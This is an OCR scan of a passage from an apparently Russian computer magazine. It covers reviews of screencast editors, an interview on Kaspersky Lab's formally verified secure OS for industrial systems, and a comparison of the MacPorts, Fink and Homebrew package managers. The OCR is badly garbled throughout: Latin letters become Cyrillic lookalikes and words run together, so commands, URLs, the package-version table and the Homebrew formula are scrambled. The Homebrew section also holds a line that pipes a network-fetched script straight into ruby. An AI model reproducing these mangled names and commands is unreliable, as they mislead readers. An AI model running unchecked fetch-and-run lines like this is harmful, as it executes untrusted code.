орепБИоІѵібео.сот 
Полная противоположность 
сложным редакторам с обилием 
кнопок и тулбаров. Здесь 
все предельно лаконично, 
функционал оптимален 
для монтажа скринкастов — 
как звука, так и видео. Доступны 
эффекты переходов, аннотации. 
Временная шкала поддерживает 
неограниченное количество треков. 



РіТіѴі 

ріііѵі.ого 

Простой видеоредактор под Ріпих, 
использует для работы фреймворк 
бзігеатег. Сгодится для не очень 
сложного монтажа, хотя рейтинг 
у РІТІѴІ сейчас невысокий ввиду 
слабой поддержки, и из СІЬипІи 
пакет в свое время был удален. 



АисІасНу 

аибасііѵ.Боигсе^огде.пеі 
Мул ьтиплатформенный 
аудиоредактор с впечатляющими 
возможностями по импорту/ 
экспорту, поддержкой 
Ѵ5Т-плагинов, эффектов 
и многим другим. Гангста- 
рэп на нем не смикшируешь, 
но для редактирования озвучки 
скринкаста инструментов более 
чем достаточно. 
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РС20ЫЕ 



Беседовал Степан Ильин 




ЧТО ПРЕДСТАВЛЯЕТ СОБОЙ 
ОПЕРАЦИОННАЯ СИСТЕМА 
ОТ КА5РЕК5КУ САВ? 



Безопасная ОС от Казрегзку ІаЬ? Будет или нет? Слухи 
на этот счет давно муссируются, но без каких-либо подробно- 
стей. Ясность появилась на организованной Международным 
союзом электросвязи конференции, которая прошла в октя- 
бре в Дубае, где компания впервые официально подтвердила, 
что ведет разработку ОС для промышленных объектов. 





Андрей Духвалов 



овольствоваться общими словами 
о незащищенности промышленной 
инфраструктуры и историями-бая- 
нами про Зіихпеі мы не хотели. Нужна была 
конкретика: пишется ли система с нуля или 
на базе уже имеющейся ОС (например, ОМХ), 
как она может решить проблему, когда наружу 
в интернетторчаттысячи программируемых 
контроллеров (РІС) с реальных промышлен- 
ных объектов, и почему эта система будет 
более безопасна, чем многие другие? При- 
шлось постараться, чтобы лично пообщать- 
ся С человеком, который непосредственно 
отвечает за разработку новой ОС, — Андреем 
Духваловым. Еще до начала интервью стало 
ЯСНО, что это один из выдающихся сотрудников 
компании: именно емуудалось решить про- 
блему С тормознутостью продуктов, за которую 
Казрегзку ІаЬ серьезно доставалось пять- 
шесть лет назад. Сейчас он занимает долж- 
ность С говорящим названием СЫеІ" Зігаіеду 
АгсЫіесІ и руководит направлением разработ- 
ки безопасной ОС. Вот что он нам рассказал. 

РРООР-ОР-СОМСЕРТ 

Разработкой операционной системы 11.11 мы 
занимаемся давно, но этот процесс долгосроч- 
ный, поэтому пока мы находимся на ранней 
стадии. Это не клон Ыпих'а и не клон ОМХ — 
все пишется с нуля. Но мы поддерживаем 
стандарты Р05ІХ, чтобы другие программы 
могли запускаться в нашей среде. В настоя- 
щий момент у нас есть прототип для платфор- 
мы х86, но мы собираемся перенести систему 
и на другие платформы, в том числе АРМ. Пе- 
ред разработкой мы поставили себе несколько 
целей, а с помощью созданного прототипа 
сами себе доказали состоятельность идей, 
которые положили в основу операционной 
системы. Многие из подходов давно известны, 
но мы взяли на себя смелость реализовать 
все в одном месте и сделать это хорошо. Все, 
что я расскажу далее, касается только про- 
тотипа — того, что мы имеем сейчас. 




ОТСУТСТВИЕ ТОЧКИ ДОВЕРИЯ 

До последнего времени при создании моделей 
информационной безопасности критически 
важных промышленных объектов бытовало 
мнение, что одной лишь физической изоляции 
объекта достаточно для его защиты. Поэтому 
о безопасности программного обеспечения 
и железа заботились в меньшей степени. На- 
пример, есть протокол М00ВІІ5, с помощью 
которого взаимодействует промышленное обо- 
рудование, например контроллер с двигателем. 
Этот протокол (как и многие другие) в стан- 
дарте не содержит средств аутентификации 
и авторизации. Любой, кто находится в этой же 
сети, может отправить любому промышленному 
устройству команду — снять данные, перепро- 
шить Пгтѵѵаге и так далее. Сам софт дырявый. 
Согласно исследованию университета Карне- 
ги — Меллона, количество ошибок в военном 
и промышленном программном обеспечении 
составляет в среднем от пяти до десяти на ты- 
сячу строк кода. Самым лучшим решением было 
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бы поменять все программное обеспечение 
и железо. Как вы понимаете, это невозмож- 
но. Но есть другой способ решить проблемы, 
которые возникают в индустриальной среде. 

Мы хотим сделать так, чтобы взаимодействие 
между узлами было под контролем. Если посмо- 
треть на типичную схему сети корпоративного 
предприятия, в которой находится множество 
разных узлов, и задаться вопросом, какой 
из этих сущностей можно доверять, выяснится, 
что никакой! Наша цель — построить такую точ- 
ку доверия и на ее основе выстраивать защиту. 

ГДЕ БУДЕТ РАБОТАТЬ ОС?" 

Чтобы стало понятнее, приведу пример. 

В самом простом случае промышленная 
инфраструктура выглядит примерно так: есть 
сенсоры, есть контроллеры, в которых заложе- 
на логика управления оборудованием, и есть 
рабочая станция со 5СА0А, которая умеет отда- 
вать контроллеру команды «перевести в тот ре- 
жим», «перевести в другой», «сделать больше», 
«сделать меньше» и прочие. Практически все 
устройства работают через протоколы М00ВІІ5, 
РгоЛЬиз или другие промышленные протоколы 
поверх привычных ТСР/ІР-протоколов, при этом 
физически подключены к обычным маршрути- 
заторам (например, Сізсо). Ничто не мешает по- 
ставить «рядом» еще один компонент, который 
на основе заранее заданных правил (специ- 
ально разработанных для каждой конкретной 
системы) сможет мониторить и контролировать 
все, что передается между системами, в том 
числе гарантируя, что данные передаются 
от легитимного источника и без изменений. 

В случае тревоги мы можем активировать 
противоаварийную защиту — в любой АСУ есть 
такие автоматизированные механизмы, 
которые реагируют на внештатные ситуации. 
Наша задача — сделать такую противоаварий- 
ную защиту с учетом информационной среды. 

Но для этого важно решить еще одну сложную 
задачу — мы на 100% должны быть уверены 
в безопасности нашей системы. 



БЕЗОПАСНАЯ ОС 

Софт может делать больше того, для чего пред- 
назначен. Основной принцип, который лежит 
в основе требований к архитектуре 11.11, — 
недопустимо исполнение незаявленной 
функциональности. Этот принцип разработки 
ОС позволяет надеяться, что внутри ОС про- 
исходит ровно то, что мы ожидаем. На любом 
телефоне есть калькулятор: кто может гаран- 
тировать, что в момент, когда мы умножаем 
два на два, он не отправляет 5М5? В 11.11 мы 
уверены, что каждый модуль делает только 
то, что он должен делать. Сложность в том, 
что этот принцип должен быть реализован 
в архитектуре системы. Нельзя сделать от- 
дельный слой поверх ядра ОС, предоставляю- 
щий такие гарантии, потому что в этом случае 
в ядре остаются уязвимости. 

КОД БЕЗ ОШИБОК 

Говорят, что программ без ошибок не бывает. 

На самом деле существует так называемая 



формальная верификация кода, с помощью 
которой можно доказать, что ошибок в нем нет. 
Утверждение об отсутствии ошибок доказы- 
вается как математическая теорема. То есть 
можно дать на вход некоторые постулаты 
и предоставить исходный код программы, реа- 
лизующий эти постулаты. Существует система, 
которая с помощью математических выводов 
способна доказать, что исходный код реали- 
зует именно эти постулаты и никакие другие. 



как есть. Это невозможно, потому что драйвер 
должен работать в соответствии с принципом 
недопустимости исполнения незаявленно- 
го функционала. Поэтому мы разбираемся, 
как он работает, и реализуем у себя. Это 
объемная работа, и мы не собираемся делать 
ее сами. Наша задача — сделать платформу, 
чтобы строить безопасные системы. Мы от- 
крыты для привлечения партнеров: работы 
много, одним нам не справиться. Мы видим 



КСТАТИ, РАБОЧЕЕ НАЗВАНИЕ 
СВЯЗАНО С ДАТОЙ НАЧАЛА РАЗРАБОТКИ 
НОВОЙ ОС 



Еще в 2009 году в рамках проекта Е4.ѵегіЛесІ 
была проведена первая формальная верифи- 
кация ядра операционной системы — микро- 
ядра зеЕ4. Доказательство было составлено 
и проведено с помощью программы ІзаЬеІІе/ 
НОЕ, предназначенной специально для до- 
казательства теорем. Для этого потребовалось 
написать более 200 000 строк специальных 
скриптов-доказательств. Всего было про- 
верено более 8700 строк С-кода и 600 строк, 
написанных на ассемблере. С помощью такого 
подхода удалось обнаружить 160 багов в ядре 
зеЕ4. У нас стоит цель — верифицировать 
таким образом свое ядро. Мы закладываем 
постулаты и имеем исходный код ядра. Далее 
с помощью математических методов доказы- 
ваем, что эти постулаты соответствуют этому 
коду. 

недопущение! 

ИСПОЛНЕНИЯ НЕЗАЯВЛЕННОЙ 
ФУНКЦИОНАЛЬНОСТИ! 

Этот базовый принцип достигается за счет 
того, что каждый из модулей ядра помещается 
в песочницу. Они могут общаться друг с другом 
посредством механизма, который жестко 
контролирует ОС. Для этого мы реализовали 
специальные методы ІРС, через которые мони- 
торится взаимодействие. И у модулей не будет 
другого способа общаться друг с другом, 
кроме как через нашу ІРС. Основная задача 
ядра ОС — это выносить вердикты, можно 
ли модулям общаться друг с другом в данный 
момент и при данных условиях или же нельзя. 
Все основные модули системы, которые мы 
привыкли относить к сервисам ядра, работают 
в рамках таких же правил. И те же правила 
применяются для пользовательских прило- 
жений. 



ДРУГИЕ КОМПОНЕНТЫ ЯДРА 

Компьютерная наука развивается более 50 лет, 
и за это время было реализовано много хоро- 
ших идей, которые мы готовы перенять. Труд- 
ность заключается в том, что наши базовые 
принципы не позволяют нам, условно говоря, 
взять уже готовый драйвер и использовать его 



свою цель — написать фреймворк, который 
позволяет другим разработчикам подменять 
модули ядра на свои собственные. Микроядер- 
ная технология во всей своей красе! Простой 
пример. В тех применениях, где критически 
важна конфиденциальность, может понадо- 
биться особенный менеджер памяти, который 
будет обнулять память, когда она высвобож- 
дается. Разработчик сможет использовать 
свой модуль для управления памятью и таким 
образом выполнить это требование конфиден- 
циальности. 

КАК МОЖНО КОНТРОЛИРОВАТЬ? 

Что касается контроля взаимодействия между 
разными компонентами взаимодействия про- 
мышленной инфраструктуры — по сути, те же 
самые принципы и математические доказа- 
тельства, которые мы используем внутри ядра, 
работают и на более высоком уровне. Если 
будет рефери, который контролирует взаи- 
модействие между компонентами системы, 
то получится взять без изменений промышлен- 
ную систему и добавить туда дополнительные 
элементы, которые повысят ее безопасность. 

МОДЕЛИ БЕЗОПАСНОСТИ 

Многие из используемых нами подходов 
существуют 20-30 лет, но их не часто можно 
встретить в реализации ОС. Моделями без- 
опасности компьютерных систем занимается 
дискретная математика. Существует много 
теоретических наработок, и есть практические 
результаты. Дискреционная и мандатная моде- 
ли безопасности очень распространены, и они 
на слуху. Но кроме них существует огромное 
число моделей безопасности: например Іуре 
епі'огзтепіз, Белла — ЛаПадула и другие. 
Каждая из них хороша в определенных усло- 
виях применения. Теория в этом направлении 
шагнула далеко — мы взяли смелость реали- 
зовать инструмент, с помощью которого можно 
будет воплотить те или иные модели безопас- 
ности на практике для тех или иных условий 
применения. Однако нужно еще время, чтобы 
довести этот во многом исследовательский 
проект до готового продукта. 
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РС20ЫЕ 



Михаил Еловских (ѵѵгопдііпкйдтаіі.сот) 




ПОДБИРАЕМ 
ИДЕАЛЬНЫЙ 
ПАКЕТНЫЙ 
МЕНЕДЖЕР ^ 
ДЛЯ МАС 05 X 



Недостающее 



Почти все знают, что в основе 05 X скрываются компоненты 
различных *піх-систем, но не всем известно, что рабочее 
окружение данной среды вполне позволяет юниксоидам 
чувствовать себя в своей тарелке. Однако полноценного 
терминала и большого количества консольных утилит 
«из коробки» недостаточно — для полного счастья 
не хватает любимого текстового редактора, обожаемого 
компилятора и пакетного менеджера, который позволил 
бы все это поставить. 



ВВЕДЕНИЕ 

В мире им IX И Ып их сложилась традиция 
«один дистрибутив — один менеджер паке- 
тов», однако Мае 05 X ей не соответствует. 
Пользователю доступны на выбор целых три 
пакетных менеджера. Наши герои сегодня: 
МасРогІБ, Ріпк и НотеЬгеѵѵ. Все они имеют 
свое особое мнение о том, как должен вы- 
глядеть процесс установки пакетов и какие 
инструменты необходимо дать пользователю. 
Чтобы попробовать все три пакетных менед- 



жера в максимально контрастных условиях, 
зададимся целью установить два популярных 
пакета (они присутствуют в каждом из трех 
репозиториев): 

1. АвтодополнениеЬазЬ. Его таксильно не- 
достает в дефолтном терминале Мае 05. 
Возьмем его как пример простого пакета, 
беззависимостей. 

2. ІтадеМадіек — тяжелый пакете большим 
количеством зависимостей. Настоящий 
комбайн для работы сизображениями. 



ПОДГОТОВКА 

Все три пакетных менеджера имеют зависи- 
мости, которые могут отсутствовать в свеже- 
установленной Мае 05: 6СС и XII. Если у вас 
они уже установлены, то данную часть смело 
можно пропустить. 

6СС 

Самый распространенный способ получить 
ОМи Сотрііег СоІІесІіоп в Мае 05 — Хсобе 
СоттапсІ Ыпе Тооіз. Его можно установить 
либо в составе самой Хсобе (из Мае Арр 
5іоге), либо с портала для разработчиков 
Арріе ( 

іпсіех.асііоп ). Потребуется пройти бесплатную 
регистрацию, но зато можно будет сэкономить 
почти 4 Гб места на жестком диске. 

Альтернативно, без установки Хсобе, 6СС 
можно поставить из специальной сборки, под- 
готовленной Кеннетом Рейтцом: Ьир5://аШіиЬ. 
сопп/кеппеіЬгеіІ2/о5х-дсс-іп5ІаІІег . 

XII 

Начиная с версии Мае 05 10.8, XII не ставится, 
что называется, из коробки, но при этом до- 
ступен на хдиагіг.гтіасозі'огде.огд . 
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Недостающее звено 



МасРог(5 

Сайт: ѵѵѵѵѵѵ.ппасрогіз.огд 

Сайт поиска портов: Ьі^.Іѵ/48оВ00 
Портов (на момент написания): 15 741 

МасРогІз зародился в самой Арріе в 2002 году. 
Кстати, тогда проект назывался ОагѵѵіпРогІз. 
Напомним, что операционная система Мае 05 
X выросла из В50, поэтому, когда дело дошло 
до менеджера пакетов, выбор справедливо 
пал на В50-порты, из которых были взяты 
основные организационные идеи и структура 
компилируемых пакетов. Стоит заметить, что 
пакетный менеджер входит в состав семейства 
Мае 05 Рогде, мейнтейнером которого является 
Арріе. Отсюда и оченьтесная интеграция в си- 
стему (например, поддержка ІаипсЬСіІ), и очень 
большой набор возможных действий. По боль- 
шей части МасРогІБ написан на ЬазЬ, ТсІ и С. 
Синтаксис командже наверняка понравится 
пользователям *В50 и Оепіоо. 

Основная идея у макпортов состоит в том, 
чтобы дать пользователю максимально 
гибкие возможности выбрать необходи- 
мое ПО благодаря так называемой системе 
вариантов (отдаленно похоже на С15Е-флаги 
в Оепіоо и такеЛІе.орІіопз в РгееВ50). Проще 
говоря — набор конфигурационных файлов 
с единым синтаксисом для выбора различных 
опций сборки пакетов. С одной стороны, такой 
выбор не может не радовать, с другой — ино- 
гда установка пакета может затянуться: 
«Нужно РНР? ОК, а какой версии — 5 или 
4? Хорошо, а 5.4, 5.3 или 5.2? Отлично, а 5.4 
с поддержкой беЬид-режима? А тос1_рЬр 
для апача поставить? А РЕАР не нужен?» Сло- 
вом, не всегда пользователю хочется вникать 
во все тонкости и особенности дистрибуции 
пакетов. 

Установка 

На странице №ѵѵ№.тасрогі5.ога/іп5(аІІ.рЬр 
можно выбрать РКО-инсталлятор. Также 
доступна установка из исходников, но она 
занимает больше времени. После запуска 
инсталлятор покажет несколько диалоговых 
окон и затем установит менеджер пакетов. Он 
сам добавит в ргоПІе-файл строчку: 

ехрогі: РАТН=/ор1:/1оса1/Ьіп:/ор1:/ <-■ 
ІосаІ/зЬіп :$РАТН 

заставляя твой шелл искать команды в дирек- 
ториях макпортов. После этого обновим базы 
портов: 

$ зисіо рог1; зеІТирсІаІіе 

Теперь менеджер пакетов готов к работе. 

Работа с пакетами 

Сначала поставим автодополнение ЬазЬ. 

Для поиска пакетов воспользуемся командой 
зеагсЬ: 

$ рог1: зеагсіі сошріеіііоп 



Посмотрим описание пакета командой іпі'о: 

$ рог1: іпТо Ьазіі- сошріеіііоп 
Установим пакет командой іпзіаіі: 

$ зисіо рогі іпзіаіі ЬазІі-сотр1е1:іоп 

Поскольку в Мае 05 ЬазЬ идеттретьей 
версии, а МасРогІз установит свою версию 
ЬазЬ версии 4, необходимо будет прописать 
путь к башу /орі/ІосаІ/Ып/ЬазЬ -I в твоем тер- 
минале. Подробней о данной проблеме можно 
прочитать здесь: Ьирз:/Лгас.ппасрог1:з.огд/ 
ѵуікі/ЬоѵѵІо/ЬазИ-соппрІеІіоп . Также необходи- 
мо будет вручную добавить инициализацию 
автодополнения в ргоЛІе-файле: 

# ЬазІі- сошріеіііоп 

ІТ [ -Т /орі/іосаі/еііс/ргобіе.сі/е 

ЬазІі_сошр1е1ііоп . 5І1 ]; Ііііеп 

. /орі/іосаі/еііс/ргобіе.сі/^ 

ЬазІі_сошр1е1ііоп . зіі 

б 



После этих действий необходимо перезапустить 
терминал. Наконец, поставим ІтадеМадіек. 

$ зисіо рогі іпзііаіі Іша§еМа§іск 

ПСЕВДОИМЕНА 

Существует множество различных псевдоимен 
портов — специальных имен, которые могут 
содержать целый набор пакетов. Например, 
команда 

$ рогі 1І5ІІ оиісіаііесі 

выведет список установленных портов, версии 
которых устарели. А команда 

$ рогі ипіпзііаіі іпзііаііесі 

удалит все установленные порты. 

КЕШ КОМПИЛЯТОРА 

Поскольку в МасРогІз все пакеты при уста- 
новке компилируются, сборка зависимостей 
может занимать очень продолжительное 
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РогІАиІЬогіІу — графический интерфейс для МасРогІз 

время. Для того чтобы ощутимо его сократить, 
в менеджере пакетов можно включить кеш 
компилятора, который при возможности будет 
брать результат компиляции из кеша. Для это- 
го необходимо установить пакет ссасЬе: 

$ зисіо рогіі іпзііаіі ссасбе 

и отредактировать файл /орі/іосаі/ек/ 
тасрогІз/тасрогІз.сопС выставив правильное 
значение у опции сопПдигессасЬе: 

сопб^игессасбе ѵез 

ПЛЮСЫ и МИНУСЫ 

с одной стороны, МасРогІз — это очень 
мощный инструмент для работы с пакетами. 

У него самый большой репозиторий (по числу 
пакетов), активное сообщество и богатый 
функционал помимо базовых функций установ- 
ки/обновления/удаления пакетов. С другой — 
он потребует от пользователя дополнительных 
усилий для изучения этого самого функциона- 
ла, а структура пакетов заставит ядро твоего 
Мака часами компилировать многочисленные 
обновления пакетов и их зависимостей. 

Кроме того, многие из этих зависимостей 
дублируют пакеты, поставляющиеся в составе 
самой Мае 05 X, — МасРогІз фактически никак 
не учитываетто, что уже есть в распоряжении 
у пользователя. С другой стороны, для кого-то 
это может оказаться и плюсом — например 
если поставляемая Арріе версия библио- 
теки по каким-то причинам не подходит. 

В то же время это дает точный контроль над 
зависимостями, ведь обновление библиотек 
не будет завязано на обновлениях самой ОС. 



РУОІХ — ПАКЕТЫ БЕЗ МЕНЕДЖЕРА 



Не всем пользователям требуется ставить множество специфических пакетов и библиотек, 
а также указывать при сборке кастомные опции. Вполне возможно, что не у каждого Мас-кодера 
есть бэкграунд в *піх и любовь к пакетным менеджерам. Для таких ситуаций может подойти 
проект Рисііх ( гисііх.огд і. Концептуально Рисііх близок к бандлам самой Мае 05 X, поэтому 
пакеты поставляются не просто в готовом виде, но и сразу со всеми зависимостями, в виде 
стандартных РКО-файлов. Проект предлагает собственный пакетный менеджер, но им можно 
и не пользоваться, устанавливая пакеты с сайта привычным для 05 X образом. Недостаток 
заключается в том, что, хотя проект находится в активном состоянии, сообщество вокруг 
него меньше, чем у других героев сегодняшнего рассказа. Достаточно сказать, что у проекта 
все еще нет официальной поддержки 05 X 10.8, вышедшей уже достаточно давно. 
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РС20ЫЕ 



Ріпк 

Сайт проекта: ѵѵѵѵѵѵ.Лпкрго]ес1.огд 

Сайт поиска пакетов: Ьіиѵ/гдІпИ 
Пакетов (на момент написания): 14 175 

Создатели Ріпк решили отойти от канонов 
В50 и за основу взяли модную на тот момент 
дебиановскую систему бинарных пакетов, 
построенную на АРТ и бркд. Отсюда следует 
главное отличие — это пакетный менеджер, 
ориентированный на работу с бинарниками, 
а не сборку из исходных кодов. 

УСТАНОВКА 

В современных версиях Мае 05 X Ріпк устанав- 
ливается путем сборки из исходников. 

На странице 5оигсеІогде.пеі/рго]есІ5Ліпк 
скачать дистрибутив, на момент написания 
статьи это Лпк-0.34.4.1аг.д2. 

$ 1;аг -Х 2 -Р бпк-0. 34.4.1;аг.§2 
$ ссі бпк-0.34.4 

$ . /Ьоо1і5І:гар 




РіпкСоттапсІег — графический интерфейс для Ріпк 



но в последнее время сервис не перестает 
«радовать» падениями различных своих 
компонентов и зеркал. Поэтому сразу после 
установки поменяем метод синхронизации 
базы пакетов, чтобы Ріпк собирал информацию 
из официального СѴ5-дерева проекта: 

$ бпк 5е1-РирсІа1:е-сѵ5 



Пакет 


Ургігеат 


МасРоПз 


Ріпк 


1 НотеЬпеѵѵ 


тузді 


5.5.28 


5.5.28 


5.0.96 


5.5.27 


ітадетадіек 


6.8.0-2 


6.8.0-2 


6.5.8.10 


6.7.7 


Іітред 


1.0 


0.7.13 


0.7.13 


1.0 


розідгезді 


9.2.1 


9.2.1 


9.1.4 


9.2.1 


ЬегкеІеу-бЬ 


5.3.21 


5.3.21 


5.3.15 


5.3.21 


розіііх 


2.9.4 


2.9.4 


2.9.0 


- 


затЬа 


3.6.8 


3.6.7 


3.6.0 


3.6.8 


здиіб 


3.2.3 


3.2.3 


3.1.14 


3.2.2 


дік 


3.6.1 


3.4.4 


2.18.9 


2.24.11 




4.8.3 


4.8.3 


4.7.3 


4.8.3 


сигі 


7.28.0 


7.28.0 


7.28.0 


7.28.0 


ѵѵдеі 


1.14 


1.14 


1.14 


1.14 


25И 


5.0.0 


5.0.0 


4.3.12 


5.0.0 


етаез 


24.2 


24.2 


23.4 


24.2 


ѵіт 


7.3.712 


7.3.661 


7.3.709 


7.3.709 


Ітих 


1.7 


1.7 


1.6 


1.7 


еііегсар 


0.7.4.1 


0.7.3 


0.7.4 


0.7.4.1 


ѵѵігезЬагк 


1.8.3 


1.8.3 


1.8.3 


1.8.3 


ѵѵіпе 


1.5.15 


1.4.1 


1.3.21 


1.4.1 







Если в системе не установлен Заѵа 50К, то 
процесс прекратится и будет вызван стандарт- 
ный диалогустановки 50К. После этого нужно 
будет повторно стартовать установку. Ріпк 
инсталлирует все пакеты в свою директорию, 
обычно это /зѵѵ, но при желании можно будет ее 
поменять (установщик спросит об этом на сле- 
дующем шаге). 

Далее инсталлятор будет спрашивать ряд 
специфичных настроек. После того как он 
получит всю необходимую информацию, можно 
запастись попкорном или полистать журнал 
дальше. По иронии судьбы, установка пакетно- 
го менеджера, в основе которого лежат бинар- 
ные пакеты, сама требует довольно продол- 
жительной компиляции :). После завершения 
установки необходимо будет добавить 'зоигсе 
/зѵѵ/Ьіп/іпіЕзЬ' в ваш ргоПІе- или Ьа5Ь_гс- 
файл. И выполнить его в консоли. 

$ есбо 'зоигсе /зы/Ьіп/іпіІ:. зіі ' »4-> 
~/.рго1і1е 

Сложно сказать, в чем причина — в злой 
судьбе или же низкой популярности проекта. 



РАБОТА С ПАКЕТАМИ 

Теперь можно поставить пакет автодополнения 
в баше. Для вывода доступных к установке па- 
кетов используется команда ІізС Ей аргументом 
можно передать фильтр по названию пакета. 

$ бпк 1І5І: сошріеіііоп 

Отлично, теперь посмотрим информацию 
об интересующем нас пакете: 



Сравнение проектов по свежести пакетов 

Перейдем к ІтадеМадіск'у. Как ни странно, 
пакет называется ітадетадіек. Поскольку 
в системе установлен только один пакет, Ріпк 
найдет множество зависимостей (полный их 
список можно получить командой Япк зЬоѵѵ- 
берз ітадетадіек) и сразуже приступить 
к их загрузке, набрав: 



$ бпк безсгіЬе Ьазіі- сошріеіііоп 



бпк іпзііаіі іітіа^еша^іск 



и установим его. Так как директория /зѵѵ 
создана с рутовыми правами, необходимо вы- 
зывать Ріпк с зибо. Впрочем, если мы забудем, 
пакетный менеджер сам позаботится об этом 
и спросит пароль: 

$ бпк іпзііаіі ЬазІі-сотр1е1:іоп 

Добавляем скрипт в инициализацию: 

$ есбо 'зоигсе /зы/еіс/ЬазІі сошріеіііоп' <- 



>> ~/.ргоб1е 



ПЛЮСЫ и МИНУСЫ 

Есть большая вероятность, что дистрибутив 
Еіпих, с которого ты перешел на Мае 05 X, 
был основан на ОеЬіап — это мог бы быть и лю- 
бой вариант ОЬипІи или МіпЕ В таком случае 
синтаксис команд Лпк покажется тебе почти 
родным, и это большое преимущество. Кроме 
того, в отличие от других участников обзора, 
этот менеджер ориентирован на работу с би- 
нарными пакетами, а не сборку из исходных 
кодов. Однако судя по всему, данный проект 
уже не пользуется должной популярностью — 
это видно по более старым пакетам, проблемам 
в инфраструктуре (оффсайтупал почти на ме- 
сяц) и меньшее количество документации. 



НотеЬгеѵѵ 

Сайт: тхсІ.дііЬиЬ.сопп/ЬоппеЬгеѵѵ 

Сайт поиска формул: Ьгаитеіз^ег.огд 
Список формул на гитхабе: ЫиуЛ99Рпп] 
Формул (на момент написания): 2146 

Заголовок страницы НотеЬгеѵѵ гласит: 
«МасРогІз сігіѵіпд уои Іо сігіпк? Тгу НотеЬгеѵѵ!» 
Отчасти это и правда. Это самый молодой 
менеджер пакетов (первые коммиты в репо- 
зиторий на гитхабе относятся к 2009 году). 

В НотеЬгеѵѵ пакеты называются формулами. 

Все исходники пакетного менеджера и его 
формул написаны на РиЬу, поэтому они очень 
легко читаются и правятся. Кроме того, проект 
размещен на гитхабе, и это просто располагает 
отправлять свои пул-реквесты с дополнениями. 

Несмотря на то что репозиторий НотеЬгеѵѵ 
содержит на порядок меньше пакетов, не стоит 
сразу сбрасывать его со счетов. Если МасРогІз 
и Ріпк пошли традиционным путем пакетиро- 
вания всего, что только можно, и в результате 
из репозитория можно поставить и питоний 
О)апдо, и рубишный Зіпаіга, то в репозитории 
НотеЬгеѵѵ вы этого не найдете. Зато Питон 
и Руби устанавливаются с нативными пакет- 
ными менеджерами (дет и рір), через которые 
уже и ставятся специфичные для каждого 
языка пакеты. Таким образом, Макс Ховел, ав- 
тор проекта, не стал дублировать функционал 
пакетных менеджеров, специфичных для кон- 
кретного языка. 

УСТАНОВКА НОМЕВВЕѴѴ 

В отличие от Ріпк и МасРогІз, НотеЬгеѵѵ 
не предполагает изоляцию собственных ди- 
ректорий и считает хорошим тоном устанав- 
ливать пакеты в /изг/іосаі. При этом разработ- 
чики также рекомендуют дать права на запись 
пользователю в эту директорию, чтобы не пи- 
сать зибо перед вызовом команды. Возможно, 
это предложение ранило тебя в самое сердце, 
и ты не одинок в своем возмущении. Да, 
теоретически, ЫМІХ — многопользовательская 
операционная система, в ней могут сосуще- 
ствовать несколько разработчиков, каждый 
из которых юзает НотеЬгеѵѵ или ставит пакеты 
иным способом (и тогда смена прав недопу- 
стима). Но часто ли ты делишь свой компьютер 
с другими пользователями и тем более — дру- 
гими кодерами? На этом попытаемся прекра- 
тить бессмысленный спор, по крайней мере 
на страницах любимого журнала. 

Как и во всем остальном, в установке 
НотеЬгеѵѵ предлагает максимальную просто- 
ту, поэтому ставится одной строчкой в консоли: 

$ гиЬу -е "$(сиг1 --РзБкІ ^ 

гаы. §і1:ЬиЬ. сот/шхсІ/ЬотеЬгеы/^о’) " 

В результате будет скачана и установлена по- 
следняя версия НотеЬгеѵѵ. 

РАБОТА С ПАКЕТАМИ 

Интерфейс работы с пакетами стандартный. 
Поиск пакета: 



$ Ьгеы зеагсЬ сошріеіііоп 

Просмотр информации о нем: 

$ Ьгеы іп-Ро ЬазЬ-сотр1е1:іоп 
Установка: 

$ Ьгеы іп5І;а11 ЬазЬ-сотр1е1;іоп 
Обновление установленных пакетов: 

І Ьгеы ц р ^габе 
Удаление пакета: 

$ Ьгеы ипіп5І:а11 ЬазЬ-сотрІеІііоп 



ФОРМУЛЫ 

Одна из киллер-фич, за которую так лю- 
бят этого новичка, — это формулы. Каждая 
формула представляет собой файл, написан- 
ный на РиЬу. По сути, формула — это класс 
с именем пакета, унаследованный от класса 
формулы, с обязательными свойствами: 

• Ьотераде — адресдомашней страницы 
пакета. Политика пакетного менедже- 
ра — не хранить описаний пакетов, так 
какониустаревают, а иметьобязательную 
ссылку на страницу пакета, где можетбыть 

и описание пакета, и документация, и другая 
информация; 

• игі — адрес, с которого будетскачиваться 
архив пакета. Кстати, НотеЬгеѵѵпоумолча- 
ниюсам пытается вычислитьверсию пакета 
из его адреса. Поэтому в большинстве своем 
авторуформулы нетнеобходимости пропи- 
сывать версию вручную. 

Также должен быть реализован метод іпзіаіі, 
в котором описывается процесс установки 
пакета. 

Для примера посмотрим на пакет АРС 
(Аиіотаіеб Раззѵѵогб Сепегаіог). Это простая 
консольная утилита, которая при вызове гене- 
рирует порцию случайных паролей. Его форму- 
ла выглядит следующим образом: 

гедиіге '-Рогшиіа' 




епб 

епб 

Если по какой-то причине тебя не устраивает 
формула, которая находится в стандартном 
репозитории, например версия пакета отлича- 
ется от той, что необходима, ты легко можешь 
создать свою локальную, поправив уже суще- 
ствующую. Для этого нужно вызвать команду 
ебіі с именем пакета: 

$ Ьгеы ебі1; ар§ 

и отредактировать открывшийся файл. После 
его сохранения пакет будет устанавливаться 
уже из локальной формулы. 

ПЛЮСЫ и МИНУСЫ 

НотеЬгеѵѵ — это свежий взгляд на мир пакет- 
ных менеджеров. Он написан на РиЬу, его код 
и код формул легко доступны и читабельны, 
а если что-то не нравится — всегда можно 
«форкнуть репу» на гитхабе. Стандартный 
репозиторий легко удовлетворит большинство 
запросов. Вокруг пакетного менеджера уже 
сформировалось довольно крупное и активное 
сообщество. Но есть и минус такого подхода — 
легкое ощущение хаоса, которое может отпуг- 
нуть пользователей, привыкших ктрадицион- 
ному строгому контролю за версиями ПО. 



сіазз Ар§ < Рогшиіа 

Ьошера§е 'Ы;1;р://ыыы.абе1.пиг5а1;.к2/ 

ар е/' 

игі ' Ы:1:р: //ыыы.абеі. пиг5а1:.к2/а р^ / <-■ 

боыпІоаб/ар^-2. 2. 3 . 1 :аг.^ 2 ' 

5Ьа1 '7ЬбЬс931е-Р8477717186бсЗаЬЗа2б <-■ 
Зс25012Ь4са' 



бе-Р іп5І:а11 

5у5І:ет "таке"^ "зііапбаіопе" ^ 

"СС=#{ЕМѴ.сс>". 

"Р^А6$=#{ЕNV.сР1а^5>^ 

"ІІВ$=". "ІІВМ=" 

Ьіп.іп5І;а11 'ар§'^ 'ар§Ь-Рш' 
шапі. іп5І;а11 'бос/шап/ар^.І'д 
' бос/тап/ар§Ь-Рш . 1 ' 



В СУХОМ ОСТАТКЕ 

Итак, из трех пакетных менеджеров до финиша 
дошло два — МасРогІз и НотеЬгеѵѵ. Каждый 
из них имеет набор уникальных возможностей, 
